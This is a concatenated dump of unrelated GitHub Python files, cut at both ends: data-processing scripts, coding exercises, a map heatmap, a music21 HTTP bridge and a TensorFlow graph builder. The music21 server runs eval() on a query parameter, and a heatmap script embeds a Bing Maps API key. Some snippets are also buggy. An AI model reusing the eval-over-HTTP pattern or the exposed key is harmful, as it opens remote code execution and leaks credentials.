pandas as pd\n\n\ndef all_path(dirname):\n result = []#所有的文件\n for maindir, subdir, file_name_list in os.walk(dirname):\n # print(\"1:\",maindir) #当前主目录\n # print(\"2:\",subdir) #当前主目录下的所有目录\n # print(\"3:\",file_name_list) #当前主目录下的所有文件\n for filename in file_name_list:\n apath = os.path.join(maindir, filename)#合并成一个完整路径\n ext = os.path.splitext(apath)[1] # 获取文件后缀,[0]获取的是除文件后缀名以外的内容 \n if ext in filt:\n result.append(apath)\n # print(os.path.splitext(apath)[0],os.path.splitext(apath)[1])\n return result\n\ndef get_cnames(result):\n cnames=[]\n for filepath in result:\n #print(get_FileSize(filename))\n size = os.path.getsize(filepath)\n if size < 1024:\n tempfilename = os.path.split(filepath)[1]\n filename = os.path.splitext(tempfilename)[0]\n print(filename)\n cnames.append()\n os.remove(filepath)\n\ndef write_cnames(cnames,filename):\n df=pd.DataFrame(cnames,columns=['cname'])\n df.to_excel(filename,index=False)\n\nif __name__=='__main__':\n filt=['.json'] #设置过滤后的文件类型,可以设置多个类型\n result=all_path(r'G:\\企业信息\\企业基本信息')\n cnames=get_cnames(result)\n write_cnames(cnames,r'G:\\企业信息\\企业基本信息\\小文件企业名.xlsx')","repo_name":"cooLBooy1128/company","sub_path":"筛选小文件.py","file_name":"筛选小文件.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16048876595","text":"# Given a set of positive numbers, find if we can partition\n# it into two subsets such that the sum of elements in both subsets is equal.\n\n# using dp so TLE will not occur\nimport pprint as p\ndef find_subset(arr):\n s = sum(arr)\n result = []\n if s%2 != 0: \n return False\n target = s //2 # THIS IS GOING TO BE MY COLUMNS \n # AND ARR IS MY ROWS \n\n dp = [[0 for i in range(target + 1)] for j in range(len(arr) + 1)]\n #print(dp)\n for i in range(1, len(arr) + 1):# rows loop \n for j in range(1, target + 1): # columns loop \n if j >= arr[i-1]:\n previous_value = dp[i-1][j] \n\n # previous value shows the value hold by previous row for the same target value \n # new value shows the value hold current arr value we have used arr[i-1]\n # as arr has 4 elements only and we increase the size dp to 4 \n # so new value is addition of current arr value and previous value of dp\n # dp[previous row][ current_target_value - current_array value]\n \n new_value = arr[i-1] + dp[i-1][j - arr[i-1]]\n dp[i][j] = max(previous_value, new_value)\n else:\n dp[i][j] = dp[i-1][j]\n\n p.pprint(dp)\n return dp[-1][-1] == target\n\nif __name__==\"__main__\":\n arr = [1,2,3,4]\n print(find_subset(arr))\n","repo_name":"dhruvagarwal29/Leetcode-Prep-Jan_2023","sub_path":"dp_revision/equal_Subset_Sum_Partition.py","file_name":"equal_Subset_Sum_Partition.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29127349933","text":"short_press = [\n { \"macro\": 10, \"effect\": \"red:ffd:flo:flu\" },\n { \"macro\": 11, \"effect\": \"grn:ffd:flo:flu\" },\n { \"cmd\": \"-3:lev\", \"effect\": \"-3:lev\" },\n { \"color\": \"tun\", \"effect\": \"tun:flo:flu\" },\n { \"raw\": \"stp:0:lev\", \"effect\": \"0:lev:-1:sch:era:flu\" }\n]\n\nlong_press = [\n { \"macro\": 12, \"effect\": \"blu:ffd:flo:flu\" },\n { \"macro\": 13, \"effect\": \"pur:ffd:flo:13:run\" },\n { \"cmd\": \"-4:lev\", \"effect\": \"-4:lev\" },\n { \"color\": \"neo\", \"effect\": \"neo:flo:flu\" },\n { \"random\": \"0,-1:rnd\", \"effect\": \"0,-1:rnd\" }\n]\n\n","repo_name":"jhogsett/linkit","sub_path":"python/mini_settings.py","file_name":"mini_settings.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"la","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"449937914","text":"#!/usr/bin/env python3\n# Author: Armit\n# Create Time: 2022/09/15 \n\nimport os\nfrom argparse import ArgumentParser\n\nimport numpy as np\nnp.random.seed(114514)\n\nSAMPLE_RATE = 16000\nHOP_LENGTH = 160\nTIME_CUTS = {\n '8h': 8 * 60 * 60,\n '4h': 4 * 60 * 60,\n '2h': 2 * 60 * 60,\n '1h': 1 * 60 * 60,\n '30min': 30 * 60,\n '10min': 10 * 60,\n}\n\ndef make_lists(args):\n in_dp = os.path.join(args.data_path, args.dataset)\n mel_dp = os.path.join(in_dp, 'mels')\n mel_fns = os.listdir(mel_dp)\n os.makedirs(args.out_dir, exist_ok=True)\n\n # make full list\n np.random.shuffle(mel_fns)\n fp = os.path.join(args.out_dir, f'{args.dataset}-full.txt')\n with open(fp, 'w', encoding='utf-8') as fh:\n for fn in mel_fns:\n fh.write(fn)\n fh.write('\\n')\n\n dur_cache = { } # {'fn': time(float)}\n n_examples = { } # {'list_name': len(selected_fns)}\n # make partial lists\n for list_name, time_cut in TIME_CUTS.items():\n np.random.shuffle(mel_fns)\n selected_fns = []\n for fn in mel_fns:\n selected_fns.append(fn)\n if fn not in dur_cache:\n mel = np.load(os.path.join(mel_dp, fn))\n dur_cache[fn] = mel.shape[1] / (SAMPLE_RATE / HOP_LENGTH)\n time_cut -= dur_cache[fn]\n if time_cut <= 0: break\n\n n_examples[list_name] = len(selected_fns)\n fp = os.path.join(args.out_dir, f'{args.dataset}-{list_name}.txt')\n with open(fp, 'w', encoding='utf-8') as fh:\n for fn in selected_fns:\n fh.write(fn)\n fh.write('\\n')\n\n fp = os.path.join(args.out_dir, f'lists-{args.dataset}.txt')\n with open(fp, 'w', encoding='utf-8') as fh:\n fh.write('[n_exmaples]\\n')\n for k, v in n_examples.items():\n fh.write(f'{k}: {v}')\n fh.write('\\n')\n fh.write(f'full: {len(mel_fns)}')\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"dataset\", metavar='dataset', help=\"dataset name\")\n parser.add_argument(\"--data_path\", default='data', help=\"data base path\")\n parser.add_argument(\"--out_dir\", default='lists', help=\"output dirname\")\n args = parser.parse_args()\n\n make_lists(args)\n","repo_name":"Kahsolt/soft-vc-acoustic-model-ablation-study","sub_path":"mk_lists.py","file_name":"mk_lists.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29540681890","text":"import os\nimport pandas as pd\nfrom collections import defaultdict\nfrom datetime import datetime\nimport CodeBook.Repair.repair as rp\nfrom copy import deepcopy\nimport argparse\nfrom CodeBook.Config import *\nfrom CodeBook.Utils.analysis_utils import has_enough_feature, has_enough_sample, convert_bool2int\nfrom CodeBook.Utils.FileHandler import read_csv\n\n\ndef _severity_val(exp: float, real: float) -> float:\n degree = (exp - real) / exp\n return degree\n\n\ndef _severity_degree(val):\n if val < SEVERITY_DICT[\"LOW\"]:\n return \"LOW\"\n elif val > SEVERITY_DICT[\"HIGH\"]:\n return \"HIGH\"\n else:\n return \"MEDIUM\"\n\n\ndef get_label_dict(input: str) -> dict:\n label_set = set()\n if input.startswith(\"mul\"):\n segs = input.split(\"__\")\n for seg in segs[1:]:\n fault_label = seg.split('_')[0]\n if \"lb_{}\".format(fault_label) in LABEL_DICT:\n label_set.add(fault_label)\n else:\n print(\"Invalid label name:\", input)\n else:\n fault_label = input.split('_')[0]\n if \"lb_{}\".format(fault_label) in LABEL_DICT:\n label_set.add(fault_label)\n else:\n print(\"Invalid label name:\", input)\n print(\"Extract labels from {}: {}\".format(input, \",\".join(label_set)))\n\n label_dict = deepcopy(LABEL_DICT)\n for lb in label_set:\n label_dict[\"lb_{}\".format(lb)] = 1\n print(\"label_dict\", label_dict)\n return label_dict\n\n\ndef update_agg_by_dict(agg, label_dict: dict) -> dict:\n for label in label_dict:\n agg[label].append(label_dict[label])\n return agg\n\n\ndef has_negative_last_act(model) -> bool:\n NEG_ACT = {\"tanh\", \"softsign\", \"elu\", \"selu\", \"leakyrelu\", 'LeakyReLU', 'ELU', 'ThresholdedReLU', \"linear\"}\n cur_act = model.layers[int(rp.last_layer(model.layers))].get_config()[\"activation\"]\n if cur_act is None:\n # print(\"Cannot find act in last layer!\")\n raise ValueError(\"Cannot find act in last layer! \")\n return False if cur_act in NEG_ACT else True\n\n\ndef output_dim_last_layer(model):\n return model.layers[int(rp.last_layer(model.layers))].output_shape[-1]\n\n# if __name__ == '__main__':\n# # print(sys.argv[0])\n# # print(os.path.dirname(sys.argv[0]))\n# parser = argparse.ArgumentParser(description=\"Feature extraction.\")\n# parser.add_argument('--dataset', '-ds', default='MNIST', help=\"Dataset name\")\n# parser.add_argument('--parent_path', '-pp', default=\"Programs\", help=\"Root path to the dataset\")\n# parser.add_argument('--result_dir', '-rs', default=\"result_dir\", help=\"Result directory\")\n# parser.add_argument('--feat_file_name', '-ffn', default=\"monitor_features.csv\", help=\"Name of Feature file\")\n# args = parser.parse_args()\n#\n# parent_path = args.parent_path\n# dataset = args.dataset\n# result_dir = args.result_dir\n# feat_file_name = args.feat_file_name\n#\n# timestamp = datetime.now().strftime(\"%y%m%d%H%M%S\")\n# output_path = os.path.join(parent_path, dataset, \"stat_{}.csv\".format(timestamp))\n#\n# agg = defaultdict(list)\n#\n# for index, program in enumerate(os.listdir(os.path.join(parent_path, dataset))):\n# print(\"\\n\", index, \"Processing dataset {} under {}\".format(dataset, parent_path))\n#\n# program_dir = os.path.join(os.path.join(parent_path, dataset, program))\n# if not os.path.isdir(program_dir):\n# continue\n#\n# for faulty_dir in os.listdir(program_dir):\n# print(\"Handling\", program_dir, faulty_dir)\n#\n# # if it is not a dir, continue\n# if not os.path.isdir(os.path.join(program_dir, faulty_dir)):\n# print(\"Skip. Not a dir.\")\n# continue\n#\n# # if monitor_features.csv does not exist, then skip\n# if not os.path.exists(os.path.join(program_dir, faulty_dir, \"result_dir\", \"monitor_features.csv\")):\n# print(\"Skip. result_dir or monitor_features.csv do not exist.\")\n# continue\n#\n# label_dict = get_label_dict(faulty_dir)\n#\n# cur_acc = 0.0\n# # if best model under this setting is better than SAT_ACC, then reset its label\n# if os.path.exists(os.path.join(program_dir, faulty_dir, \"result_dir\", \"checkpoint_model\")):\n# for file in os.listdir(os.path.join(program_dir, faulty_dir, \"result_dir\", \"checkpoint_model\")):\n# try:\n# cur_acc = max(float(file.replace(\".h5\", \"\").split(\"_\")[-1]), cur_acc)\n# except ValueError as e:\n# continue\n#\n# if cur_acc >= SAT_ACC[dataset]:\n# print(\"Reset Label to 'origin' because acc = {} >= {}\".format(cur_acc, SAT_ACC[dataset]))\n# label_dict = deepcopy(LABEL_DICT)\n# break\n#\n# sev_val = _severity_val(SAT_ACC[dataset], cur_acc)\n# sev_degree = _severity_degree(sev_val)\n#\n# # concat path\n# file_path = os.path.join(program_dir, faulty_dir, result_dir, feat_file_name)\n#\n# # read csv, extract features\n# df = read_csv(file_path)\n# if has_enough_feature(df, min_feature=10) and has_enough_sample(df, min_sample=5):\n# # preprocess, convert bool dtype ot int if necessary\n# df = convert_bool2int(df)\n#\n# # feature dimension is wrong\n# # if df.shape[1] != 22:\n# # print(\"Incorrect feature dimension, should be 22, got\", df.shape[1])\n# # continue\n#\n# # add program id, labels and label values\n# agg[\"program_id\"].append(program)\n# agg[\"Folder_id\"].append(faulty_dir)\n# agg = update_agg_by_dict(agg, label_dict)\n#\n# # agg[\"label\"].append(label)\n# # agg[\"severity_val\"].append(sev_val)\n# # agg[\"severity\"].append(sev_degree)\n#\n# agg = extract_feature(df, agg)\n# print(\"Done\\n\")\n#\n# # for debug only\n# # for k, v in agg.items():\n# # print(k, len(v))\n#\n# agg_df = pd.DataFrame.from_dict(agg)\n# agg_df.to_csv(output_path)\n# print(\"Export output to \", output_path)\n","repo_name":"ArabelaTso/DeepFD","sub_path":"CodeBook/Analyzer/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"39331531301","text":"# Призеры олимпиады\n# По результатам олимпиады участники награждаются дипломами.\n# Набравшие одинаковые баллы получают дипломы одинаковой степени.\n# Призером олимпиады считается участник, получивший диплом не хуже III степени.\n# По результатам олимпиады определите количество призеров.\n# Вход: натуральное число участников(N < 100) и далее N натуральных# чисел – результаты участников.\n# Выход: одно число – число призеров.\n# Пример:\n# Вход\n#\n# 10 1 3 4 3 5 6 7 7 6 1\n# Выход\n# 5\n\n\ndef gen_list(size, at=-100, to=100):\n import random\n return [random.randint(at, to) for _ in range(size)]\n\n\ndef bubble_sort(nums, key=lambda x: x, reverse=False):\n swapped = True\n j = 0\n while swapped:\n swapped = False\n for i in range(len(nums) - 1 - j):\n if reverse:\n expr = key(nums[i]) < key(nums[i + 1])\n else:\n expr = key(nums[i]) > key(nums[i + 1])\n if expr:\n nums[i], nums[i + 1] = nums[i + 1], nums[i]\n swapped = True\n j += 1\n return nums\n\n\ndef rewarding(people: list):\n people = bubble_sort(people, reverse=True)\n prev = people[0]\n prizes = 0\n steps = 1\n for human in people:\n if steps <= 3:\n prizes += 1\n if prev != human:\n steps += 1\n prev = human\n return prizes - 1\n\nif __name__ == '__main__':\n olympigs = [10, 1, 3, 4, 3, 5, 6, 7, 7, 6, 1]\n winners = rewarding(olympigs)\n print(f'Призёров всего : {winners}')\n","repo_name":"xm4dn355x/specialist_python3_2nd_lvl","sub_path":"Module02/practice/06_task_sort.py","file_name":"06_task_sort.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37304522154","text":"class Solution:\n def sumEvenAfterQueries(self, nums: List[int], queries: List[List[int]]) -> List[int]:\n n = len(nums)\n evensum = 0\n for el in nums:\n if el % 2 == 0:\n evensum += el\n res = []\n for val, i in queries:\n if nums[i] % 2 == 0:\n evensum -= nums[i]\n nums[i] += val\n if nums[i] % 2 == 0:\n evensum += nums[i]\n res.append(evensum)\n return res","repo_name":"theabbie/leetcode","sub_path":"sum-of-even-numbers-after-queries.py","file_name":"sum-of-even-numbers-after-queries.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"5404850491","text":"import pandas as pd\r\nimport geopandas as gpd\r\nimport folium\r\nimport geocoder \r\nfrom folium.plugins import HeatMap\r\nfrom time import sleep\r\n\r\n# Load the Excel file with hotel data into a DataFrame\r\ndf = pd.read_excel(\"2017.xlsx\")\r\n\r\n\r\n# Assuming your Excel column with city names is named 'City' (change to the actual column name)\r\n# You may need to clean and preprocess the data to ensure the 'City' column is consistent and accurate.\r\ncity_counts = df['City'].value_counts()\r\nfor x in city_counts.keys():\r\n print(x,city_counts[x])\r\n\r\n\r\n\r\ng = geocoder.bing('Delhi', key='AsGXdjL7aL-H4vZdjl5m7BnlELyKTMi4_-CFrr7W4s4LQAkIWmkLZaO6cAD4iqAh')\r\nresults = g.json\r\nprint(results['lat'], results['lng'])\r\nlocations=[]\r\nfor x in city_counts.keys():\r\n g = geocoder.bing(x, key='AsGXdjL7aL-H4vZdjl5m7BnlELyKTMi4_-CFrr7W4s4LQAkIWmkLZaO6cAD4iqAh')\r\n results = g.json\r\n if(results==None):\r\n break\r\n # print(results['lat'], results['lng'])\r\n locations.append((x,results['lat'], results['lng']))\r\n \r\n\r\nprint(locations)\r\n\r\n# m=folium.Map([48,5],zoom_start=5)\r\n# HeatMap(locations )\r\n\r\n# # Download India's shapefile (for plotting boundaries)\r\n# india_map = gpd.read_file('indiashp')\r\n\r\n# # Merge hotel counts with India's shapefile based on city name\r\n# india_hotels = india_map.merge(city_counts, left_on='id', right_index=True,)\r\n\r\n# print(india_hotels)\r\n\r\n# india_hotels['geometry'] = india_hotels['geometry'].centroid\r\n# india_hotels['LAT'] = india_hotels['geometry'].y\r\n# india_hotels['LON'] = india_hotels['geometry'].x\r\n\r\n\r\n# print(\"\\n\\n\")\r\n# for _,y in india_hotels.iterrows():\r\n# print(y) \r\n# print(\"\\n\\n\")\r\n\r\n\r\n# Create a base map centered around India\r\nm = folium.Map(location=[20.5937, 78.9629], zoom_start=5)\r\n\r\n# Create a heatmap using the hotel counts\r\nheat_data = [(row[1], row[2], int(city_counts[row[0]])) for row in locations]\r\nprint(heat_data)\r\nHeatMap(heat_data, radius=15).add_to(m)\r\n\r\n# Save the map to an HTML file or display it\r\nm.save('heatmap.html')\r\n\r\n","repo_name":"PratikNimbalkar0404/Analysis-of-Hospitality-and-Tourism-Industry-of-India","sub_path":"GUI/mapcode.py","file_name":"mapcode.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73503634921","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nfrom music21 import chord\nimport os\nimport sys\nimport json\n\n# 対象のポート番号\nport: int = 8080\nif len(sys.argv) >= 1:\n try:\n port = int(sys.argv[1])\n except:\n pass\n\naddress = ('localhost', port)\nvartable = {}\ndo_exit = False\n_server = None\n\n\ndef callback(value) -> dict:\n \"\"\"\n 引数のオブジェクトからmusic21を実行して結果を辞書で返します\n \"\"\"\n global do_exit\n global vartable\n ret: dict = {}\n if 'command' not in value:\n return ret\n # コマンドごとに処理を分岐する\n command = value['command']\n if command == 'eval':\n expr = eval(value['source'])\n vartable[value['to']] = expr\n print(f'>> {expr}')\n ret = expr\n elif command == 'exit':\n do_exit = True\n else:\n raise f'unexpected command: {command}'\n return ret\n\n\nclass MyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n global do_exit\n global _server\n parsed = urlparse(self.path)\n params = parse_qs(parsed.query)\n if 'json' not in params:\n self.send_response(400)\n return\n query = params['json']\n if len(query) == 0:\n self.send_response(400)\n return\n print(f'- {query}')\n self.send_response(200)\n self.send_header('Content-Type', 'text/plain; charset=utf-8')\n self.end_headers()\n try:\n obj = json.loads(query[0])\n self.wfile.write(json.dumps(\n {'status': 0, 'value': callback(obj)}).encode('utf-8'))\n except:\n print(f'!! {sys.exc_info()}')\n self.wfile.write(json.dumps(\n {'status': 1, 'value': {}}).encode('utf-8'))\n if do_exit:\n _server.server_close()\n\n def do_POST(self):\n self.send_response(400)\n\n\ndef main():\n global do_exit\n global _server\n with HTTPServer(address, MyHTTPRequestHandler) as server:\n _server = server\n while not do_exit:\n server.handle_request()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"desktopgame/music21server","sub_path":"src/m21server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3466495750","text":"import csv\n\ntry:\n from StringIO import StringIO # python 2\nexcept ImportError:\n from io import StringIO # python 3\n\n\nclass CSVRenderer(object):\n def __init__(self, info):\n pass\n\n def __call__(self, value, system):\n \"\"\" Returns a plain CSV-encoded string with content-type\n ``text/csv``. The content-type may be overridden by\n setting ``request.response.content_type``.\"\"\"\n\n request = system.get(\"request\")\n if request is not None:\n response = request.response\n ct = response.content_type\n if ct == response.default_content_type:\n response.content_type = \"text/csv; charset=utf-8\"\n\n fout = StringIO()\n writer = csv.writer(fout, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n writer.writerow(value.get(\"headers\", []))\n writer.writerows(value.get(\"rows\", []))\n\n return fout.getvalue()\n","repo_name":"GFDRR/thinkhazard","sub_path":"thinkhazard/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"18"} +{"seq_id":"69833448681","text":"from __future__ import print_function\nfrom annette.estimation import layers\nimport json\nimport numpy as np\nimport pandas as pd\nimport pickle as pkl\nimport logging\nfrom pathlib import Path\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport os\n\nfrom annette import get_database \nfrom annette.graph import AnnetteGraph\n\n#TODO renaming of tf_variables and move some things to the tf file\n\ndef generate_tf_model(graph):\n \"\"\"generates Tensorflow 2 graph out of ANNETTE graph description\n and stores to benchmark/graphs/tf2/ directory\n\n Args:\n graph :obj:`annette.graph.AnnetteGraph`: annette graph description to generate the tf2 graph from\n \"\"\"\n\n # generate tensorflow model and export to out_file\n\n # with __dict__ we can see the content of the class\n logging.debug(graph.__dict__)\n\n # model_spec contains some info about the model\n for key, value in graph.model_spec.items():\n logging.debug(key)\n logging.debug(value)\n\n network_name = graph.model_spec['name']\n\n filename = get_database( 'benchmark', 'graphs' ,'tf2', network_name+'.pb')\n logging.debug(\"Stored to: %s\" % filename)\n\n\nclass Graph_generator():\n \"\"\"Graph generator\"\"\"\n\n def __init__(self, network):\n #load graphstruct\n json_file = get_database('graphs','annette',network+'.json')\n self.graph = AnnetteGraph(network, json_file)\n print(self.graph)\n #load configfile\n \n def add_configfile(self, configfile):\n self.config = pd.read_csv(get_database('benchmarks','config', configfile))\n print(self.config)\n\n def generate_graph_from_config(self, num):\n # can be used as to generate input for generate_tf_model\n # execute the function under test\n\n def replace_key(value, config, num):\n if value in self.config.keys():\n logging.debug(\"%s detected\", value)\n return int(self.config.iloc[num][value])\n else:\n return value\n\n # model_spec contains some info about the model\n for key, value in self.graph.model_spec.items():\n logging.debug(key)\n logging.debug(value)\n\n tf.compat.v1.reset_default_graph()\n self.tf_graph = {}\n\n for layer_n, layer_attrs in self.graph.model_spec['layers'].items():\n logging.debug(\"layer name %s \" % layer_n)\n logging.debug(\"layer attrs %s \" % layer_attrs)\n for attr_n,attr_v in layer_attrs.items():\n logging.debug(\"attribute name %s\" % attr_n)\n logging.debug(\"attribute values %s\" % attr_v)\n\n if isinstance(attr_v, list):\n for n,attr_ele in enumerate(attr_v):\n #logging.debug(n)\n #logging.debug(attr_ele)\n self.graph.model_spec['layers'][layer_n][attr_n][n] = replace_key(attr_ele, self.config, num)\n else:\n self.graph.model_spec['layers'][layer_n][attr_n] = replace_key(attr_v, self.config, num)\n\n self.graph.compute_dims()\n\n logging.debug(\"Loop through layers\")\n\n for layer_n, layer_attrs in self.graph.model_spec['layers'].items():\n if layer_attrs['type'] == \"DataInput\":\n self.tf_graph[layer_n] = self.tf_gen_placeholder(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Conv\":\n self.tf_graph[layer_n] = self.tf_gen_conv(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Relu\":\n self.tf_graph[layer_n] = self.tf_gen_relu(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Add\":\n self.tf_graph[layer_n] = self.tf_gen_add(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"DepthwiseConv\":\n self.tf_graph[layer_n] = self.tf_gen_dwconv(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Pool\":\n self.tf_graph[layer_n] = self.tf_gen_pool(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Concat\":\n self.tf_graph[layer_n] = self.tf_gen_concat(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Flatten\":\n self.tf_graph[layer_n] = self.tf_gen_flatten(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Softmax\":\n self.tf_graph[layer_n] = self.tf_gen_softmax(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"MatMul\" or layer_attrs['type'] == \"FullyConnected\": # TODO check this! Maybe FullyConnected with bias\n self.tf_graph[layer_n] = self.tf_gen_matmul(layer_attrs, layer_n)\n else:\n print(\"no layer\")\n exit()\n\n logging.debug(\"Config %s\" % self.config.iloc[num])\n logging.debug(\"Current graph %s\" % self.tf_graph)\n\n # return annette graph\n out = self.graph.model_spec['output_layers']\n logging.debug(self.graph.model_spec)\n self.tf_export_to_pb(out)\n return out \n\n def tf_export_to_pb(self, output_node, save_path = None):\n # Collect default graph information\n g = tf.get_default_graph()\n\n with tf.Session() as sess:\n # Initialize the variables\n sess.run(tf.global_variables_initializer())\n g = g.as_graph_def(add_shapes = True)\n\n # Convert variables to constants until the \"fully_conn_1/Softmax\" node\n frozen_graph_def = tf.graph_util.convert_variables_to_constants(sess, g, output_node)\n\n print(\"load graph\")\n graph_nodes=[n for n in frozen_graph_def.node]\n names = []\n for t in graph_nodes:\n if not (\"Variable\" in t.name or \"BiasAdd\" in t.name):\n names.append(t.name.replace(\"/\",\"_\").replace(\"-\",\"_\"))\n print(names)\n\n # Write the intermediate representation of the graph to .pb file\n if save_path:\n net_file = save_path\n else:\n net_file = get_database('graphs','tf',self.graph.model_spec['name']+\".pb\")\n print(net_file)\n with open(os.path.join(net_file), 'wb') as f:\n graph_string = (frozen_graph_def.SerializeToString())\n f.write(graph_string)\n\n def tf_gen_pool(self, layer, name=None):\n logging.debug(\"Generating Relu with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n k_w = layer['kernel_shape'][1]\n k_h = layer['kernel_shape'][2]\n stride_w = layer['strides'][1]\n stride_h = layer['strides'][2]\n if layer['pooling_type'] == 'MAX':\n return maxpool(inp, (k_w, k_h),(stride_w, stride_h), name)\n elif layer['pooling_type'] == 'AVG' and layer['kernel_shape'][1] == -1:\n return globavgpool(inp, name)\n elif layer['pooling_type'] == 'AVG':\n return avgpool(inp, (k_w, k_h),(stride_w, stride_h), name)\n else:\n logging.error(\"only max pooling implemented currently\")\n exit()\n\n def tf_gen_concat(self, layer, name=None):\n logging.debug(\"Generating Concat with dict: %s\" % layer)\n inp_name0 = layer['parents'][0]\n inp_name1 = layer['parents'][1]\n inp = [self.tf_graph[x] for x in layer['parents']]\n return tf.concat(inp,axis=3,name=name)\n\n def tf_gen_add(self, layer, name=None):\n logging.debug(\"Generating Add with dict: %s\" % layer)\n if len(layer['parents']) == 2:\n inp_name0 = layer['parents'][0]\n inp_name1 = layer['parents'][1]\n inp0 = self.tf_graph[inp_name0]\n inp1 = self.tf_graph[inp_name1]\n return tf.add(inp0, inp1, name=name)\n else:\n raise NotImplementedError\n\n def tf_gen_flatten(self, layer, name=None):\n logging.debug(\"Generating Flatten with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n return flatten(inp, name)\n\n def tf_gen_relu(self, layer, name=None):\n logging.debug(\"Generating Relu with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n return relu(inp, name)\n\n def tf_gen_softmax(self, layer, name=None):\n logging.debug(\"Generating Softmax with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n return softmax(inp, name)\n\n def tf_gen_matmul(self, layer, name=None):\n logging.debug(\"Generating MatMul with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n filters = layer['output_shape'][1]\n return matmul(inp, filters, name)\n\n def tf_gen_conv(self, layer, name=None):\n logging.debug(\"Generating Conv with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n filters = layer['output_shape'][3]\n k_w = layer['kernel_shape'][0]\n k_h = layer['kernel_shape'][1]\n stride_w = layer['strides'][1]\n stride_h = layer['strides'][2]\n return conv2d(inp, filters, (k_w,k_h), (stride_w,stride_h), name)\n\n def tf_gen_dwconv(self, layer, name=None):\n logging.debug(\"Generating DWConv with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n k_w = layer['kernel_shape'][0]\n k_h = layer['kernel_shape'][1]\n inp = self.tf_graph[inp_name]\n filters = layer['output_shape'][3]\n #return tf.layers.separable_conv2d(inp, filters, (k_w,k_h), padding='same')\n return dw_conv2d(inp, (k_w,k_h), (1, 1), name)\n\n def tf_gen_placeholder(self, layer, name=\"x\"):\n logging.debug(\"Generating Placeholder with dict: %s\" % layer)\n batch_size = layer['output_shape'][0]\n if batch_size == -1:\n batch_size = 1\n width = layer['output_shape'][1] \n height = layer['output_shape'][2]\n channels = layer['output_shape'][3]\n return tf.compat.v1.placeholder(tf.float32, [batch_size, width, height, channels], name=name)\n\ndef dw_conv2d(x_tensor, conv_ksize, stride, name):\n layer = slim.separable_convolution2d(x_tensor,\n num_outputs=None,\n stride=stride,\n depth_multiplier=1,\n kernel_size=conv_ksize,\n scope=name)\n return layer\n \n\ndef conv2d(x_tensor, filters, conv_ksize, stride, name):\n # Weights\n conv_strides = stride\n W_shape = list(conv_ksize) + [int(x_tensor.shape[3]), filters]\n W = tf.Variable(tf.truncated_normal(W_shape, stddev=.05))\n\n # Apply convolution\n x = tf.nn.conv2d(\n x_tensor, W,\n strides = [1] + list(conv_strides) + [1],\n padding = 'SAME',\n name = name\n )\n\n return x\n\ndef relu(x_tensor, name):\n # Nonlinear activation (ReLU)\n x = tf.nn.relu(x_tensor,name=name)\n return x\n\ndef softmax(x_tensor, name):\n # Nonlinear activation (ReLU)\n x = tf.nn.softmax(x_tensor,name=name)\n return x\n\ndef globavgpool(x_tensor, name='avg_pool'):\n x = tf.reduce_mean(x_tensor, axis=[1,2], name = name)\n return x\n\ndef maxpool(x_tensor, pool_ksize, pool_strides, name='max_pool'):\n # Max pooling\n x = tf.nn.max_pool(\n x_tensor,\n ksize = [1] + list(pool_ksize) + [1],\n strides = [1] + list(pool_strides) + [1],\n padding = 'SAME',\n name = name\n )\n return x\n\ndef avgpool(x_tensor, pool_ksize, pool_strides, name='avg_pool'):\n x = tf.nn.avg_pool(\n x_tensor,\n ksize = [1] + list(pool_ksize) + [1],\n strides = [1] + list(pool_strides) + [1],\n padding = 'SAME',\n name = name\n )\n\n return x\n\ndef flatten(x_tensor, name):\n x = tf.reshape(x_tensor, [1, np.prod(x_tensor.shape.as_list()[1:])], name = name)\n return x\n\ndef matmul(x_tensor, num_outputs, name):\n # 